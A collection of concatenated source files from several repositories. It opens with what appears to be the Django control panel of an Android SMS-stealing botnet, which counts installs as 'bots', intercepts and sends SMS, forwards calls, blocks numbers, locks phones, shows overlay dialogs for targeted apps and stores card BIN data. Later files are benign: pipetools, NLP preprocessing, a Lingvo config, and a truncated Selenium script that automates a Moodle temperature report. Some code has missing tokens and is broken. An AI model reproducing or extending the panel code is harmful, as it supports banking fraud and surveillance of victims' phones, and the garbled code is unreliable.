i.phone_id) > 1 ORDER BY num_used DESC; """ cursor.execute(query, [country_code]) return cursor.fetchall() # noinspection PyMethodMayBeStatic def get_country_list_of_senders(self): cursor = connection.cursor() query = """ SELECT DISTINCT AS code FROM smsapp_phonedata AS p, smsapp_internalsms AS s WHERE ORDER BY code """ cursor.execute(query) return cursor.fetchall() class InternalSMS(models.Model): sender = models.ForeignKey(ISender, verbose_name=_("sender"), null=True) contents = models.TextField(verbose_name=_("SMS Text")) created = models.DateTimeField(auto_now_add=True) phone = models.ForeignKey(PhoneData) objects = InternalSMSManager() def __unicode__(self): return "from: {f}, phone: {p}".format(f=self.sender, class Meta: verbose_name = _("internal SMS") verbose_name_plural = _("internal SMSs") class InstalledAppsManager(models.Manager): # noinspection PyMethodMayBeStatic def get_top_apps(self): cursor = connection.cursor() query = """ SELECT name, COUNT(phone_id) AS cnt FROM smsapp_installedapp GROUP BY name HAVING COUNT(phone_id) > 1 ORDER BY cnt DESC """ cursor.execute(query) return cursor.fetchall() # noinspection PyMethodMayBeStatic def get_top_apps_by_country(self, country_code): cursor = connection.cursor() query = """ SELECT, COUNT(a.phone_id) AS cnt FROM smsapp_installedapp AS a, smsapp_phonedata AS p WHERE a.phone_id = AND GROUP BY HAVING COUNT(a.phone_id) > 1 ORDER BY cnt DESC """ cursor.execute(query, [country_code]) return cursor.fetchall() class InstalledApp(models.Model): name = models.CharField(max_length=255, db_index=True) phone = models.ForeignKey(PhoneData) objects = InstalledAppsManager() def __unicode__(self): return class Meta: verbose_name = _("installed application") verbose_name_plural = _("installed applications") index_together = [['name', 'phone'], ] class AppDialog(models.Model): description = models.CharField(max_length=255) html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True) apps = models.TextField(verbose_name=_("app filter"), help_text=_("1 package per line")) def __unicode__(self): return self.description class Meta: verbose_name = _("application dialog") verbose_name_plural = _("application dialogues") def create_custom_permissions(): try: ct, created = ContentType.objects.get_or_create(model='', app_label='smsapp', name='view cards') Permission.objects.get_or_create(codename='view_cards', content_type=ct, name='View cards info') except ProgrammingError: logger.error("Content type tables haven't been initialized yet") try: create_custom_permissions() except AppRegistryNotReady: pass class Option(models.Model): name = models.CharField(max_length=255, unique=True) content = models.TextField(blank=True) @receiver(post_save, sender=AppDialog) def set_html_version(instance, **kw): opt, created = Option.objects.get_or_create(name='html version') opt.content = datetime.utcnow() # resetting cache settings.REDIS.delete([DB_HTML_VERSION, DB_HTML_CACHE]) class BinData(models.Model): cid = models.IntegerField(primary_key=True) card = models.CharField(max_length=255, blank=True) bank = models.CharField(max_length=255, null=True) ctype = models.CharField(max_length=64, blank=True, null=True) clevel = models.CharField(max_length=64, blank=True, null=True) country = models.CharField(max_length=2, blank=True, null=True) ``` #### File: smsg_r/smsapp/ ```python from StringIO import StringIO import gzip import json from django.conf import settings from django.core.handlers.wsgi import WSGIRequest from django.test import TestCase, Client from . import command_queue, models, idgen, commands, remote_api, cache class RequestFactory(Client): def request(self, **request): environ = { 'HTTP_COOKIE': self.cookies, 'PATH_INFO': '/', 'QUERY_STRING': '', 'REQUEST_METHOD': 'GET', 'SCRIPT_NAME': '', 'SERVER_NAME': 'testserver', 'SERVER_PORT': 80, 'SERVER_PROTOCOL': 'HTTP/1.1', } environ.update(self.defaults) environ.update(request) return WSGIRequest(environ) class CommandTest(TestCase): def setUp(self): settings.REDIS.flushdb() self.user = models.SysUser.objects.create(username="test") = models.PhoneData.objects.create(number="322223", imei="ZZ345", country="RU") self.installer = models.Installer.objects.create(username='installer1', user_id=1) self.dialog1 = models.RemoteDialog.objects.create(sender='testsender1', description='t1', dlg1='f1', html_contents='<html><body>hello 1</body></html>') self.dialog1 = models.RemoteDialog.objects.create(sender='testsender2', app='testapp', priority=10, description='t2', dlg1='f2', html_contents='<html><body>hello 2</body></html>' ) self.phone_id = def test_command_queue(self): # initial checks self.assertTrue(command_queue.has_commands( self.phone_id)) # # todo: fix test so it takes into account sentid command in buffer after new phone created self.assertEqual('#sentid +13478096873', command_queue.get_next_command(self.phone_id)) self.assertEqual(commands.PHONE_STATE_STABLE, commands.get_phone_transient_state(self.phone_id)) # add the command and run state checks commands.reserve_phone(self.user, self.assertTrue(command_queue.has_commands(self.phone_id)) self.assertEqual("#intercept_sms_start", command_queue.get_next_command(self.phone_id)) self.assertEqual(commands.PHONE_STATE_LOCKING, commands.get_phone_transient_state(self.phone_id)) def test_registration(self): def test_with_data(test_app_data): rf = RequestFactory() buf = StringIO(test_app_data) outb = StringIO() f = gzip.GzipFile(fileobj=outb, mode='wb') f.write(test_app_data) data = outb.getvalue() rf_post ='/app/remote', data=data, content_type='application/json') rf_post.META['HTTP_CONTENT_ENCODING'] = "gzip" resp = remote_api.process(rf_post) self.assertEqual(200, resp.status_code, "Executed successfully") ro = json.loads(resp.content) code = ro['code'] self.assertEqual(10, len(code)) resp = remote_api.process('/app/remote', data='{"type": "device check", "code": "' + code + '"}', content_type='application/json')) self.assertEqual(200, resp.status_code, "Executed successfully") return json.loads(resp.content) test_app_data0 = """ { "os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+111111111","client number":"1","type":"device info", "imei":"111111111111","country":"US", "operator" : "ZZZ" } """ ro = test_with_data(test_app_data0) self.assertEqual('', ro['command']) test_app_data1 = """ { "os":"4.0.3","model":"LGE LG-XXXXX","phone number":"+222222222","client number":"1","type":"device info", "imei":"2222222222","country":"US", "operator" : "ZZZ", "sms": [{"from": "testsender1", "body": "test SMS 1"}], "apps": ["testapp"] } """ ro = test_with_data(test_app_data1) self.assertEqual('#show_html', ro['command']) self.assertEqual('f2', ro['params']['first dialog']) models.Option.objects.create(name="blacklist", content=""" testapp """) cache.rebuild_cache() ro = test_with_data(test_app_data1) self.assertEqual('#show_html', ro['command']) class IDGenerateTest(TestCase): def test_generate_id(self): uniq_id = idgen.generate_uniq_id() print uniq_id self.assertEqual(10, len(uniq_id)) class OperatorTest(TestCase): def test_operator_name(self): op = models.MobileOperator(name="310260") self.assertEqual('T-Mobile (260) - Bermuda', unicode(op)) op1 = models.MobileOperator(name='311580') self.assertEqual('Unknown (311/580)', unicode(op1)) op2 = models.MobileOperator(name='666322') self.assertEqual('Unknown (666/322)', unicode(op2)) class CacheTest(TestCase): def setUp(self): models.Option.objects.create(name="blacklist", content=""" ttt aaa zzzz """) def test_cache(self): cache.rebuild_cache() self.assertTrue(cache.is_blacklisted('aaa')) ``` #### File: smsg_r/smsapp/ ```python import json import logging import datetime from django.contrib import messages from django.contrib.auth.decorators import login_required from django.contrib.auth.forms import AuthenticationForm from django.contrib.auth import login as auth_login from django.contrib.auth.models import User from django.db.models import Q from django.http import HttpResponse, HttpResponseServerError from django.shortcuts import render, redirect, get_object_or_404 from django.contrib.auth import logout from django.utils import timezone from django.views.decorators.cache import never_cache from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.http import require_http_methods from django.utils.translation import ugettext_lazy as _ from smsapp import models, commands, sys_messages, cfields logger = logging.getLogger(__name__) def home(request): if if request.user.is_staff: return redirect('admin:index') # check if user is an installer try: inst = models.Installer.objects.get( now = # beginning of the day bod = datetime.datetime(year=now.year, month=now.month,, hour=0, minute=0, second=0, tzinfo=timezone.get_current_timezone()) phonedata_set = models.PhoneData.objects.filter(installer=inst) return render(request, "install_stats.html", { 'total_bots': phonedata_set.count(), 'bots_today': phonedata_set.filter(registered__gte=bod).count(), }) except models.Installer.DoesNotExist: return render(request, "countries.html", {'data': models.PhoneData.objects.get_country_list(}) return render(request, "index.html") @login_required() def logout_local(request): logout(request) messages.success(request, _("Logged out")) return redirect("home") @login_required() def inside_country(request, country): return render(request, "inside_country.html", {'country': country, 'phones': models.PhoneData.objects.get_active_phones(, country)}) @login_required() def sms_list(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) sms_data = pd.smsrecord_set.filter(source__isnull=False).order_by('-created').all() blocked_data = pd.blockednumber_set.all() user_comments = None if request.user.is_superuser: comment = pd.admin_comment if pd.admin_comment else "" user_comments = pd.usercomment_set.all() else: try: su = models.SysUser.objects.get( comment = models.UserComment.objects.get(phone=pd, user=su) comment = comment.contents if comment else "" except models.UserComment.DoesNotExist: comment = "" if request.is_ajax(): l = [] for s in reversed(sms_data): l.append({'from': s.source, 'id':, 'text': s.contents}) ctx = {'sms_data': l} return HttpResponse(json.dumps(ctx), content_type="application/json") ctx = { 'sms_data': sms_data, 'phone_data': pd, 'blocked_data': blocked_data, 'app_data': pd.installedapp_set.all(), 'int_sms_data': pd.internalsms_set.all(), 'comment': comment, 'user_comments': user_comments, } return render(request, "phone_details.html", ctx) class StateError(Exception): pass def get_boolean_from_request(request, key, method='POST'): """ gets the value from request and returns it's boolean state """ value = getattr(request, method).get(key, False) if value == 'False' or value == 'false' or value == '0' or value == 0: value = False elif value: value = True else: value = False return value @login_required() @require_http_methods(["POST"]) def send_sms(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) to = request.POST.get("recipient") txt = request.POST.get("sms") commands.send_sms(pd, to, txt) return HttpResponse(json.dumps({'success': "SMS successfully sent to {0}".format(to)}), content_type="application/json") @login_required() @require_http_methods(["POST"]) def forward_calls(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) number = request.POST.get('number') commands.forward_calls(pd, number) return HttpResponse(json.dumps({'success': "Starting call forwarding to {0}".format(number)}), content_type="application/json") @login_required() @require_http_methods(["POST"]) def disable_forward_calls(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) commands.disable_forward_calls(pd) return HttpResponse(json.dumps({'success': "Disabling call forwarding"}), content_type="application/json") @login_required() @require_http_methods(["POST"]) def toggle_phone(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) flag = get_boolean_from_request(request, 'flag') try: if pd.owner_id is not None and pd.owner_id != raise StateError("Another user is already using this phone") if flag: # release all other owned phones for p in models.PhoneData.objects.exclude(id=phone_id).filter( commands.release_phone(p) if pd.owner_id is None: user = User.objects.get( if not commands.reserve_phone(user, pd): raise StateError("Could not reserve the phone") return HttpResponse( json.dumps({'success': "Please wait while intercept starts", 'result': 1}), content_type="application/json") elif pd.owner_id == sys_messages.add_message(pd.uniq_id, {'imei': pd.imei}) # to switch off the indicator return HttpResponse(json.dumps({'warning': "The phone is already in intercept status", 'result': 1}), content_type="application/json") else: if pd.owner_id == commands.release_phone(pd) return HttpResponse( json.dumps({'success': "The phone {0} is going to be released".format(pd), 'result': 0}), content_type="application/json") raise StateError("Unknown error") except StateError as e: logger.error("Error processing phone state request: {0}".format(e)) return HttpResponseServerError(e) @login_required() @require_http_methods(["POST"]) def unblock_number(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) all = request.POST.get('all') if all: commands.unblock_all(pd) return HttpResponse( json.dumps({'success': "Sent command to unblock all numbers"}), content_type="application/json") else: number = request.POST.get('number') commands.unblock_phone(pd, number) return HttpResponse( json.dumps({'success': "Sent command to unblock number {0}".format(number)}), content_type="application/json") @login_required() @require_http_methods(["POST"]) def block_number(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) number = request.POST.get('number') commands.block_phone(pd, number) return HttpResponse( json.dumps({'success': "Sent command to block number {0}".format(number)}), content_type="application/json") @login_required() def history(request): phone_list = models.SMSRecord.objects.filter('phone').order_by( 'phone').distinct('phone') return render(request, "history.html", {'phones': phone_list}) @login_required() def clear_messages(request, phone_id): pd = get_object_or_404(models.PhoneData, Q(pk=phone_id) & Q( messages.success(request, "Messages cleared {0}".format(pd)) models.SMSRecord.objects.filter(phone=pd).all().delete() return redirect('history') @login_required() @require_http_methods(["POST"]) def get_messages(request, phone_id): phone = get_object_or_404(models.PhoneData, pk=phone_id) commands.touch_phone(phone.uniq_id) msg_list = [] while True: m = sys_messages.retrieve_next_message(phone.uniq_id) if m is None: break msg_list.append(m) resp = {'messages': msg_list} if len(msg_list) else {} return HttpResponse(json.dumps(resp), content_type="application/json") @sensitive_post_parameters() @require_http_methods(["POST"]) @never_cache def login(request): form = AuthenticationForm(request, data=request.POST) if form.is_valid(): auth_login(request, form.get_user()) messages.success(request, "Logged in") return redirect('home') messages.error(request, "Login failed") return redirect('home') @login_required() @require_http_methods(["POST"]) def get_country_operators(request): ccode = request.POST.get("ccode") lst = cfields.get_operator_choices(ccode) res = {'success': True, 'choices': lst} return HttpResponse(json.dumps(res), content_type="application/json") @login_required() @require_http_methods(["POST"]) def save_comment(request, phone_id): phone = get_object_or_404(models.PhoneData, pk=phone_id) contents = request.POST.get("contents") if request.user.is_superuser: phone.admin_comment = contents else: user = get_object_or_404(models.SysUser, c, created = models.UserComment.objects.get_or_create(user=user, phone=phone) c.contents = contents resp = {'success': True} return HttpResponse(json.dumps(resp), content_type="application/json") @login_required() @require_http_methods(["POST"]) def lock_phone(request, phone_id): pd = get_object_or_404(models.PhoneData, pk=phone_id) flag = get_boolean_from_request(request, 'flag') try: if pd.owner_id is not None and pd.owner_id != raise StateError("Another user is already using this phone") if flag: if pd.locked: raise StateError("The phone is already in locked status") commands.device_lock(pd, True) return HttpResponse( json.dumps({'success': "The phone {0} is going to be locked".format(pd), 'result': 0}), content_type="application/json") else: if not pd.locked: raise StateError("The phone is not locked") commands.device_lock(pd, False) return HttpResponse( json.dumps({'success': "The phone {0} is going to be unlocked".format(pd), 'result': 0}), content_type="application/json") except StateError as e: logger.error("Error processing phone state request: {0}".format(e)) return HttpResponseServerError(e) ```
{ "source": "0100101001010000/PyTechnicalIndicators", "score": 3 }
#### File: tests/Single/ ```python import unittest from PyTechnicalIndicators.Single import candle_indicators class TestCandleIndicators(unittest.TestCase): def setUp(self): self.prices = [100, 101, 102, 101, 103, 100] def test_bollinger_band(self): def test_bollinger_band_failure(self): def test_ichimoku_cloud(self): def test_ichimoku_cloud_failure(self): def test_personalised_bb(self): def test_personalised_bb_failure(self): def test_personalised_icloud(self): def test_personalised_icloud_failure(self): if __name__ == '__main__': unittest.main() ```
{ "source": "0101011/analitikr", "score": 3 }
#### File: 0101011/analitikr/ ```python from nltk.tokenize import word_tokenize as tokenize import json, config, nltk, itertools from os import path import numpy as np import cPickle as pickle WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyz' VOCAB_SIZE = 1200 UNK = 'unk' limit = { 'max_descriptions' : 400, 'min_descriptions' : 0, 'max_headings' : 20, 'min_headings' : 0, } def load_raw_data(filename): with open(filename, 'r') as fp: raw_data = json.load(fp) print('Loaded {:,} articles from {}'.format(len(raw_data), filename)) return raw_data def tokenize_sentence(sentence): return ' '.join(list(tokenize(sentence))) def article_is_complete(article): # Check if an article has both heading and description if ('abstract' not in article) or ('article' not in article): return False if (article['abstract'] is None) or (article['article'] is None): return False return True def tokenize_articles(raw_data): # Tokenizes data and creates list of headings and descriptions headings, descriptions = [], [] num_articles = len(raw_data) for i, a in enumerate(raw_data): if article_is_complete(a): headings.append(tokenize_sentence(a['abstract'])) descriptions.append(tokenize_sentence(a['article'])) if i % config.print_freq == 0: print('Tokenized {:,} / {:,} articles'.format(i, num_articles)) return (headings, descriptions) def filter(line, whitelist): # Filters out all characters which are not in whitelist return ''.join([ch for ch in line if ch in whitelist]) def filter_length(headings, descriptions): if len(headings) != len(descriptions): raise Exception('Number of headings does not match number of descriptions!') filtered_headings, filtered_descriptions = [], [] for i in range(0, len(headings)): heading_length = len(headings[i].split(' ')) description_length = len(descriptions[i].split(' ')) if description_length >= limit['min_descriptions'] and description_length <= limit['max_descriptions']: if heading_length >= limit['min_headings'] and heading_length <= limit['max_headings']: filtered_headings.append(headings[i]) filtered_descriptions.append(descriptions[i]) print('Length of filtered headings: {:,}'.format(len(filtered_headings))) print('Length of filtered descriptions: {:,}'.format(len(filtered_descriptions))) return (filtered_headings, filtered_descriptions) def index_data(tokenized_sentences, vocab_size): # Forms vocab, idx2word and word2idx dicts freq_dist = nltk.FreqDist(itertools.chain(*tokenized_sentences)) vocab = freq_dist.most_common(vocab_size) print('Vocab length: {:,}'.format(len(vocab))) idx2word = ['_'] + [UNK] + [x[0] for x in vocab] word2idx = dict([(w, i) for i, w in enumerate(idx2word)]) return (idx2word, word2idx, freq_dist) def pad_seq(seq, lookup, max_length): # Pads sequence with zero values indices = [] for word in seq: if word in lookup: indices.append(lookup[word]) else: indices.append(lookup[UNK]) return indices + [0]*(max_length - len(seq)) def zero_pad(tokenized_headings, tokenized_descriptions, word2idx): # Stores indices in numpy arrays and # Creates zero padding where required data_length = len(tokenized_descriptions) idx_descriptions = np.zeros([data_length, limit['max_descriptions']], dtype=np.int32) idx_headings = np.zeros([data_length, limit['max_headings']], dtype=np.int32) for i in range(data_length): description_indices = pad_seq(tokenized_descriptions[i], word2idx, limit['max_descriptions']) heading_indices = pad_seq(tokenized_headings[i], word2idx, limit['max_headings']) idx_descriptions[i] = np.array(description_indices) idx_headings[i] = np.array(heading_indices) return (idx_headings, idx_descriptions) def process_data(): #load data from file filename = path.join(config.path_data, 'raw_data.json') raw_data = load_raw_data(filename) #tokenize articles and separate into headings and descriptions headings, descriptions = tokenize_articles(raw_data) #keep only whitelisted characters and articles satisfying the length limits headings = [filter(heading, WHITELIST) for heading in headings] descriptions = [filter(sentence, WHITELIST) for sentence in descriptions] headings, descriptions = filter_length(headings, descriptions) #convert list of sentences into list of list of words word_tokenized_headings = [word_list.split(' ') for word_list in headings] word_tokenized_descriptions = [word_list.split(' ') for word_list in descriptions] #indexing idx2word, word2idx, freq_dist = index_data(word_tokenized_headings + word_tokenized_descriptions, VOCAB_SIZE) #save as numpy array and do zero padding idx_headings, idx_descriptions = zero_pad(word_tokenized_headings, word_tokenized_descriptions, word2idx) #check percentage of unks unk_percentage = calculate_unk_percentage(idx_headings, idx_descriptions, word2idx) print(calculate_unk_percentage(idx_headings, idx_descriptions, word2idx)) article_data = { 'word2idx' : word2idx, 'idx2word': idx2word, 'limit': limit, 'freq_dist': freq_dist, } pickle_data(article_data) return (idx_headings, idx_descriptions) def pickle_data(article_data): # Saves obj to disk as a pickle file with open(path.join(config.path_data, 'article_data.pkl'), 'wb') as fp: pickle.dump(article_data, fp, 2) def unpickle_articles(): # Loads pickle file from disk to give obj with open(path.join(config.path_data, 'article_data.pkl'), 'rb') as fp: article_data = pickle.load(fp) return article_data def calculate_unk_percentage(idx_headings, idx_descriptions, word2idx): num_unk = (idx_headings == word2idx[UNK]).sum() + (idx_descriptions == word2idx[UNK]).sum() num_words = (idx_headings > word2idx[UNK]).sum() + (idx_descriptions > word2idx[UNK]).sum() return (num_unk / num_words) * 100 def main(): process_data() if __name__ == '__main__': main() ```
{ "source": "0101011/tensorflow-essentials", "score": 3 }
#### File: tensorflow-essentials/19_lingvo/ ```python def Task(cls): p = model.AsrModel.Params() = 'librispeech' # Initialize encoder params. ep = p.encoder # Data consists 240 dimensional frames (80 x 3 frames), which we # re-interpret as individual 80 dimensional frames. See also, # LibrispeechCommonAsrInputParams. ep.input_shape = [None, None, 80, 1] ep.lstm_cell_size = 1024 ep.num_lstm_layers = 4 ep.conv_filter_shapes = [(3, 3, 1, 32), (3, 3, 32, 32)] ep.conv_filter_strides = [(2, 2), (2, 2)] ep.cnn_tpl.params_init = py_utils.WeightInit.Gaussian(0.001) # Disable conv LSTM layers. ep.num_conv_lstm_layers = 0 # Initialize decoder params. dp = p.decoder dp.rnn_cell_dim = 1024 dp.rnn_layers = 2 dp.source_dim = 2048 # Use functional while based unrolling. dp.use_while_loop_based_unrolling = False tp = p.train tp.learning_rate = 2.5e-4 tp.lr_schedule = lr_schedule.ContinuousLearningRateSchedule.Params().Set( start_step=50000, half_life_steps=100000, min=0.01) # Setting p.eval.samples_per_summary to a large value ensures that dev, # devother, test, testother are evaluated completely (since num_samples for # each of these sets is less than 5000), while train summaries will be # computed on 5000 examples. p.eval.samples_per_summary = 5000 p.eval.decoder_samples_per_summary = 0 # Use variational weight noise to prevent overfitting. = True p.train.vn_std = 0.075 p.train.vn_start_step = 20000 return p ```
{ "source": "0101/pipetools", "score": 2 }
#### File: pipetools/build_scripts/ ```python import codecs import re from pipetools import foreach, X, pipe DOC_ROOT = '' readme_template = """ Pipetools ========= |tests-badge| |coverage-badge| |pypi-badge| .. |tests-badge| image:: :target: .. |coverage-badge| image:: :target: .. |pypi-badge| image:: :target: `Complete documentation <{0}>`_ {{0}} But wait, there is more ----------------------- Checkout `the Maybe pipe <{0}maybe>`_, `partial application on steroids <{0}xpartial>`_ or `automatic data structure creation <{0}pipeutils#automatic-data-structure-creation>`_ in the `full documentation <{0}#contents>`_. """.format(DOC_ROOT) link_template = u"`{text} <%s{url}>`_" % DOC_ROOT link_replacements = ( # :doc:`pipe-utils' documentation<pipeutils>`. (r":doc:`([^<]*)<([^>]*)>`", {'url': r'\2.html', 'text': r'\1'}), # :func:`~pipetools.utils.where` (r":func:`~pipetools\.utils\.([^`]*)`", {'url': r'pipeutils.html#pipetools.utils.\1', 'text': r'\1()'}), ) > foreach([X[0] | re.compile, X[1] | link_template]) def create_readme(): with'docs/source/overview.rst', 'r', 'utf-8') as overview: with'README.rst', 'w+', 'utf-8') as readme: > pipe | fix_links | readme_template | readme.write def fix_links(string): for pattern, replacement in link_replacements: string = pattern.sub(replacement, string) return string if __name__ == '__main__': create_readme() ``` #### File: pipetools/pipetools/ ```python try: from import Iterable except ImportError: from collections import Iterable from functools import partial, wraps, WRAPPER_ASSIGNMENTS from pipetools.debug import get_name, set_name, repr_args from pipetools.compat import text_type, string_types, dict_items class Pipe(object): """ Pipe-style combinator. Example:: p = pipe | F | G | H p(x) == H(G(F(x))) """ def __init__(self, func=None): self.func = func self.__name__ = 'Pipe' def __str__(self): return get_name(self.func) __repr__ = __str__ @staticmethod def compose(first, second): name = lambda: '{0} | {1}'.format(get_name(first), get_name(second)) def composite(*args, **kwargs): return second(first(*args, **kwargs)) return set_name(name, composite) @classmethod def bind(cls, first, second, new_cls=None): return (new_cls or cls)( first if second is None else second if first is None else cls.compose(first, second)) def __or__(self, next_func): # Handle multiple pipes in pipe definition and also changing pipe type to e.g. Maybe # this is needed because of evaluation order pipe_in_a_pipe = isinstance(next_func, Pipe) and next_func.func is None new_cls = type(next_func) if pipe_in_a_pipe else None next = None if pipe_in_a_pipe else prepare_function_for_pipe(next_func) return self.bind(self.func, next, new_cls) def __ror__(self, prev_func): return self.bind(prepare_function_for_pipe(prev_func), self.func) def __lt__(self, thing): return self.func(thing) if self.func else thing def __call__(self, *args, **kwargs): return self.func(*args, **kwargs) def __get__(self, instance, owner): return partial(self, instance) if instance else self pipe = Pipe() class Maybe(Pipe): @staticmethod def compose(first, second): name = lambda: '{0} ?| {1}'.format(get_name(first), get_name(second)) def composite(*args, **kwargs): result = first(*args, **kwargs) return None if result is None else second(result) return set_name(name, composite) def __call__(self, *args, **kwargs): if len(args) == 1 and args[0] is None and not kwargs: return None return self.func(*args, **kwargs) def __lt__(self, thing): return ( None if thing is None else self.func(thing) if self.func else thing) maybe = Maybe() def prepare_function_for_pipe(thing): if isinstance(thing, XObject): return ~thing if isinstance(thing, tuple): return xpartial(*thing) if isinstance(thing, string_types): return StringFormatter(thing) if callable(thing): return thing raise ValueError('Cannot pipe %s' % thing) def StringFormatter(template): f = text_type(template).format def format(content): if isinstance(content, dict): return f(**content) if _iterable(content): return f(*content) return f(content) return set_name(lambda: "format('%s')" % template[:20], format) def _iterable(obj): "Iterable but not a string" return isinstance(obj, Iterable) and not isinstance(obj, string_types) class XObject(object): def __init__(self, func=None): self._func = func set_name(lambda: get_name(func) if func else 'X', self) def __repr__(self): return get_name(self) def __invert__(self): return self._func or set_name('X', lambda x: x) def bind(self, name, func): set_name(name, func) return XObject((self._func | func) if self._func else (pipe | func)) def __call__(self, *args, **kwargs): name = lambda: 'X(%s)' % repr_args(*args, **kwargs) return self.bind(name, lambda x: x(*args, **kwargs)) def __hash__(self): return super(XObject, self).__hash__() def __eq__(self, other): return self.bind(lambda: 'X == {0!r}'.format(other), lambda x: x == other) def __getattr__(self, name): return self.bind(lambda: 'X.{0}'.format(name), lambda x: getattr(x, name)) def __getitem__(self, item): return self.bind(lambda: 'X[{0!r}]'.format(item), lambda x: x[item]) def __gt__(self, other): return self.bind(lambda: 'X > {0!r}'.format(other), lambda x: x > other) def __ge__(self, other): return self.bind(lambda: 'X >= {0!r}'.format(other), lambda x: x >= other) def __lt__(self, other): return self.bind(lambda: 'X < {0!r}'.format(other), lambda x: x < other) def __le__(self, other): return self.bind(lambda: 'X <= {0!r}'.format(other), lambda x: x <= other) def __mod__(self, y): return self.bind(lambda: 'X % {0!r}'.format(y), lambda x: x % y) def __ne__(self, other): return self.bind(lambda: 'X != {0!r}'.format(other), lambda x: x != other) def __neg__(self): return self.bind(lambda: '-X', lambda x: -x) def __mul__(self, other): return self.bind(lambda: 'X * {0!r}'.format(other), lambda x: x * other) def __floordiv__(self, other): return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x // other) def __div__(self, other): return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other) def __truediv__(self, other): return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other) def __add__(self, other): return self.bind(lambda: 'X + {0!r}'.format(other), lambda x: x + other) def __sub__(self, other): return self.bind(lambda: 'X - {0!r}'.format(other), lambda x: x - other) def __pow__(self, other): return self.bind(lambda: 'X ** {0!r}'.format(other), lambda x: x ** other) def __ror__(self, func): return pipe | func | self def __or__(self, func): if isinstance(func, Pipe): return func.__ror__(self) return pipe | self | func def _in_(self, y): return self.bind(lambda: 'X._in_({0!r})'.format(y), lambda x: x in y) X = XObject() def xpartial(func, *xargs, **xkwargs): """ Like :func:`functools.partial`, but can take an :class:`XObject` placeholder that will be replaced with the first positional argument when the partially applied function is called. Useful when the function's positional arguments' order doesn't fit your situation, e.g.: >>> reverse_range = xpartial(range, X, 0, -1) >>> reverse_range(5) [5, 4, 3, 2, 1] It can also be used to transform the positional argument to a keyword argument, which can come in handy inside a *pipe*:: xpartial(objects.get, id=X) Also the XObjects are evaluated, which can be used for some sort of destructuring of the argument:: xpartial(somefunc,, number=X.contacts['number']) Lastly, unlike :func:`functools.partial`, this creates a regular function which will bind to classes (like the ``curry`` function from ``django.utils.functional``). """ any_x = any(isinstance(a, XObject) for a in xargs + tuple(xkwargs.values())) use = lambda x, value: (~x)(value) if isinstance(x, XObject) else x @wraps(func, assigned=filter(partial(hasattr, func), WRAPPER_ASSIGNMENTS)) def xpartially_applied(*func_args, **func_kwargs): if any_x: if not func_args: raise ValueError('Function "%s" partially applied with an ' 'X placeholder but called with no positional arguments.' % get_name(func)) first = func_args[0] rest = func_args[1:] args = tuple(use(x, first) for x in xargs) + rest kwargs = dict((k, use(x, first)) for k, x in dict_items(xkwargs)) kwargs.update(func_kwargs) else: args = xargs + func_args kwargs = dict(xkwargs, **func_kwargs) return func(*args, **kwargs) name = lambda: '%s(%s)' % (get_name(func), repr_args(*xargs, **xkwargs)) return set_name(name, xpartially_applied) ```
{ "source": "010Ri/BodyTemperature-Reporting-System-For-Moodle", "score": 3 }
#### File: 010Ri/BodyTemperature-Reporting-System-For-Moodle/ ```python from selenium import webdriver from time import sleep from import Options # elements for log in LMS (moodle) : ログインに必要な要素 USERNAME = 'USERNAME' PASSWORD = 'PASSWORD' # elements for filling form : 体温報告に必要な要素 BodyTemperature = input('今日の体温を入力してください(少数点第一位まで):') Others = '特になし' # initializes 初期設定 error_flg = False target_url = 'URL' # moodle URL # FUNCTION access : str == button name , click automatically and redirect to next page : access関数の定義:ボタンの名前をstrで指定し、クリックして次の画面へ進む def access(str): try: access_button = driver.find_element_by_link_text(str) sleep(3) except Exception: error_flg = True print(str + 'ボタン押下時にエラーが発生しました。') # turn on WebDriver : WebDriverの起動 options = Options() options.add_argument('--headless') # ここをコメントアウトすればヘッドレスモードを無効にできる driver = webdriver.Chrome('C:\Program Files (x86)\Google\Chrome\chromedriver',options=options) driver.get(target_url) sleep(3) # login process : ログイン処理 if error_flg is False: try: username_input = driver.find_element_by_name("username") username_input.send_keys(USERNAME) sleep(1) password_input = driver.find_element_by_name("password") password_input.send_keys(PASSWORD) sleep(1) username_input.submit() sleep(1) except Exception: print('ユーザー名、パスワード入力時にエラーが発生しました。') error_flg = True # press take-exam-again button if error_flg is False: try: again_button = driver.find_element_by_xpath('//form/button[@type="submit"]') sleep(3) except Exception: error_flg = True print('もう一度受験するボタン押下時にエラーが発生しました。') # fill form if error_flg is False: try: BodyTemperature_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[1]/div[2]/div[1]/div[2]/span/input') BodyTemperature_input.send_keys(BodyTemperature) sleep(1) others_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[3]/div[2]/div/div[2]/label/span/input') others_input.send_keys(Others) sleep(1) except Exception: print('体温の入力時にエラーが発生しました。') error_flg = True if error_flg is False: try: Q_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[2]/div[2]/div/div[2]/div[2]/div[1]/input[2]') driver.execute_script("arguments[0].click();",Q_button) sleep(3) except Exception: error_flg = True print('症状のボタン押下時にエラーが発生しました。') # press finish-exam button if error_flg is False: try: next_button = driver.find_element_by_name('next') sleep(3) except Exception: error_flg = True print('テストを終了する ...ボタン押下時にエラーが発生しました。') if error_flg is False: try: submit_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/div[3]/div/div/form/button') sleep(3) except Exception: error_flg = True print('すべての解答を送信して終了するボタン押下時にエラーが発生しました。') if error_flg is False: try: check_button = driver.find_element_by_xpath('/html/body/div[4]/div[3]/div/div[2]/div/div[2]/input[1]') sleep(3) except Exception: error_flg = True print('「確認」すべての解答を送信して終了するボタン押下時にエラーが発生しました。') if 